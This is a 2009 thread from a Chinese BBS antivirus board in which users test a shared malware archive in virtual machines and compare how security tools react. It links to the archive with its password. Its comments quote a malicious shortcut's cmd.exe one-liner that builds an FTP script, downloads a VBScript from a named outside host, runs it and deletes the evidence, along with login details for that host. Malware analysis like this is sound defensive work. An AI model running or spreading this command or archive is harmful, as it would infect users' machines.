Re: [推薦] 病毒包又來了!!!

看板AntiVirus作者時間15年前 (2009/01/29 17:04), 編輯推噓8(8032)
留言40則, 3人參與, 最新討論串6/8 (看更多)
※ 引述《pgpayton (該認真了)》之銘言: : ※ 引述《TypeZero (TypeZero)》之銘言: : : http://www.badongo.com/file/12940373 : : 密碼:ptt.cc : 我也無聊在虛擬機測試了一下 : 虛擬機裝comodo with D+(paranoid mode) 和DefenseWall : 把病毒包解壓縮 再把裡面的壓縮檔再解壓縮(有17個壞檔) 再依副檔名分類 : 執行了幾個download 跟 lnk 檔 D+無反應 : DefenseWall 看註冊表跟event log 也沒發現任何異常 : 其他的com檔 exe檔 shortcut檔 vbe檔 我沒有每個執行(太多了= =") : 基本上D+的提示都差不多 修改登錄檔 提權 連線 : DefenseWall也有把修改跟加載的東西列出來 : 所以這些應該是病毒沒錯(total 61個) : 然後用紅傘掃描(use smart extensions) 偵測到81個 : 除了exe,com,shortcut,vbe檔以外 發現3個download跟1個txt 18個lnk檔有毒 : download跟txt檔 type都是Zip 所以我把這幾個檔 副檔名改Zip 確實裡面包含exe跟vbe檔 : 而其他的我改副檔名倒是沒發現啥 : 至於紅傘掃到的lnk檔 我執行它一樣沒事情發生 : 因此對電腦有危害的(使用者誤點的情況下)就是那61個檔案 : 其他的就請高手說明lnk跟download檔到底要是啥? : (ps google lnk結果 http://bbs.mychat.to/read.php?tid=559803&page=e) : 以上....不負責任測試 ̄▽ ̄|| lnk檔d+無反應->comodo的規則中對cmd.exe,ftp.exe的執行及對檔案(如vbs、exe、 ico檔等)寫入%windir%或%userprofile%目錄下的設置是? 如果你有開啟comodo防火牆,不妨先關閉再測,在我測試的過程中,它會阻檔ftp下載 ----我的測試也是不負責任--------------- 有些lnk是無效的 有些lnk無檔案可下載 有些則是相當的豐富. -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 59.112.10.194
01/30 13:06, , 1F
D+ 預設情況下早已將windows重要的資料夾加入保護
01/30 13:06, 1F
01/30 13:10, , 2F
未經授權的程序是不容許竄改的 防火牆沒必要關閉吧
01/30 13:10, 2F
01/30 13:11, , 3F
因為Ftp.exe要往外連 會有提示 我測的結果是lnk都無效
01/30 13:11, 3F
01/30 13:12, , 4F
不然請您把有效的lnk丟給我
01/30 13:12, 4F
01/30 14:51, , 5F
@@刺套跳蛋@@.download,更改副檔名為lnk
01/30 14:51, 5F
01/30 14:51, , 6F
查一下computer security plolicy內cmd.exe的規則…
01/30 14:51, 6F
01/30 14:51, , 7F
如果fd阻止t.t及link.vbs的創建,就不能測試了
01/30 14:51, 7F
01/30 14:52, , 8F
很久沒有使用defense wall了,不了解它在情形如何…
01/30 14:52, 8F
01/30 14:53, , 9F
以下是跳蛋其中一段
01/30 14:53, 9F
01/30 14:53, , 10F
%windir%\system32\cmd.exe
01/30 14:53, 10F
01/30 14:54, , 11F
/c echo open onehla.3322.org >t.t&echo 123>>t.t&echo
01/30 14:54, 11F
01/30 14:55, , 12F
get 1-1 %windir%\link.vbs>>t.t&echo bye>>t.t&ftp -s:
01/30 14:55, 12F
01/30 14:55, , 13F
t.t&del t.t&start %windir%\link.vbs&
01/30 14:55, 13F
01/30 14:56, , 14F
%windir%\system32\cmd.exe
01/30 14:56, 14F
01/30 14:56, , 15F
15-1645522239-1606980848-500_CLASSES
01/30 14:56, 15F
01/30 14:57, , 16F
Lucida Console
01/30 14:57, 16F
01/30 14:59, , 17F
其實也不必去run,在網址列輸入ftp:\\onehla.3322.org
01/30 14:59, 17F
01/30 15:01, , 18F
輸入username:123,password:123,也可下載....
01/30 15:01, 18F
01/30 16:00, , 19F
D+ fd預設根本沒設cmd.exe的規則 有設的話此病毒包的病毒
01/30 16:00, 19F
01/30 16:01, , 20F
大部分都沒辦法執行 另外為啥要改副檔名? 我是指原本病毒
01/30 16:01, 20F
01/30 16:03, , 21F
包的lnk檔 那些download檔 我點擊也都是沒任何事發生
01/30 16:03, 21F
01/30 16:04, , 22F
download檔我就沒每個試
01/30 16:04, 22F
01/30 16:34, , 23F
computer security plolicy->AD
01/30 16:34, 23F
01/30 16:35, , 24F
原Po已說過download檔是lnk檔....
01/30 16:35, 24F
01/30 16:53, , 25F
AD沒設cmd的規則阿 另外要改副檔名才能執行病毒 那就跟
01/30 16:53, 25F
01/30 16:54, , 26F
防毒軟體的隔離 差不多了 也就是使用者誤點也無法執行
01/30 16:54, 26F
01/30 17:10, , 27F
如果您未曾設cmd規則,在執行lnk檔時,在paranoid模式下
01/30 17:10, 27F
01/30 17:11, , 28F
應會出現explorer.exe excute cmd.exe的詢問視窗
01/30 17:11, 28F
01/30 17:12, , 29F
所以您說d+無反應,個人才會不解....
01/30 17:12, 29F
01/30 17:12, , 30F
另外您說的沒錯副檔名download是不能直接在雙擊執行的..
01/30 17:12, 30F
01/30 17:23, , 31F
這是因為google瀏覽器會自動改副檔名...
01/30 17:23, 31F
01/30 17:24, , 32F
explorer.exe excute cmd.exe? 我是執行lnk檔 並不是cmd
01/30 17:24, 32F
01/30 17:25, , 33F
如果改成無法執行的副檔名 那也就不能怪防毒的偵測率低弱
01/30 17:25, 33F
01/30 17:27, , 34F
謝謝T大的說明...
01/30 17:27, 34F
01/30 17:28, , 35F
也不是說D+無反應 因為explorer.exe是執行某檔案D+會出現
01/30 17:28, 35F
01/30 17:29, , 36F
的正常提示 我應該改成D+無偵測到可疑行為
01/30 17:29, 36F
01/30 17:32, , 37F
謝謝p大的說明,這病毒包讓我又學到很多東西,感謝...
01/30 17:32, 37F
01/30 17:38, , 38F
為了安全起見建議p大將cmd,ntvdm,?script等列入黑名單..
01/30 17:38, 38F
01/30 17:41, , 39F
感謝你的好意 不過我電腦並沒裝comodo..
01/30 17:41, 39F
01/30 18:03, , 40F
另外請教T大為何有的會改成無效的副檔名? 有的不會?
01/30 18:03, 40F
更多 miamodo 的文章
文章代碼(AID): #19WN4lg8 (AntiVirus)
討論串 (同標題文章)
本文引述了以下文章的的內容:
以下文章回應了本文
完整討論串 (本文為第 6 之 8 篇):
排序: 最舊先 | 最新先 | 留言數
在新視窗開啟完整討論串 (共8篇)
更多 miamodo 的文章
文章代碼(AID): #19WN4lg8 (AntiVirus)